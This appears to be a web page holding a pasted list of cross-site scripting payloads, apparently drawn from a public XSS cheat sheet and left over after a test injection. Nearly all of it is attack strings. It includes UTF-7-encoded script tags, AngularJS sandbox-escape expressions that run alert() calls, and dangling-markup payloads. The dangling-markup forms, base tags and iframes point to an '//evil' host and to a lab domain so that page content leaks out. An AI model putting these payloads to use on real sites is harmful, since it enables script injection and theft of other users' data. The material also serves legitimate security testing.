<h1>hello</h1>

sdddddd

XSS XSS XSS test test test test test test test test test test test test test drop here test drop here test test test test test test test test test test test XSS (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) Test +ADw-script+AD4-alert(130)+ADw-/script+AD4- +ADw-script+AD4-alert(131)+ADw-/script+AD4- XSS XSS XSS XSS XSS XSS XSS XSS Firefox Firefox {{constructor.constructor('alert(149)')()}} {{$on.constructor('alert(150)')()}} {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(151)')()}} {{{}.")));alert(152)//"}} {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(153)')()}} {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(154)"].sort(toString.constructor);}} {{{}.")));alert(155)//"}} {{{}.")));alert(156)//"}} {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(157)//');}} {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(158)//');}} {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(159)');}} {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(160)//');}} {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(161)');}} {{constructor.constructor('alert(162)')()}} {{$on.constructor('alert(163)')()}} constructor.constructor('alert(164)')() a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(165)')() toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(166)"].sort(toString.constructor) {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(167)')() {}.")));alert(168)//"; 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(169)//'; constructor.constructor('alert(170)')() toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41) XSS <button form=x>XSS</button><form id=x action=//evil target=' <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target=" <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget=" <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/ <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=" <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=" <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=" <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=" javascript:/*--></title></style>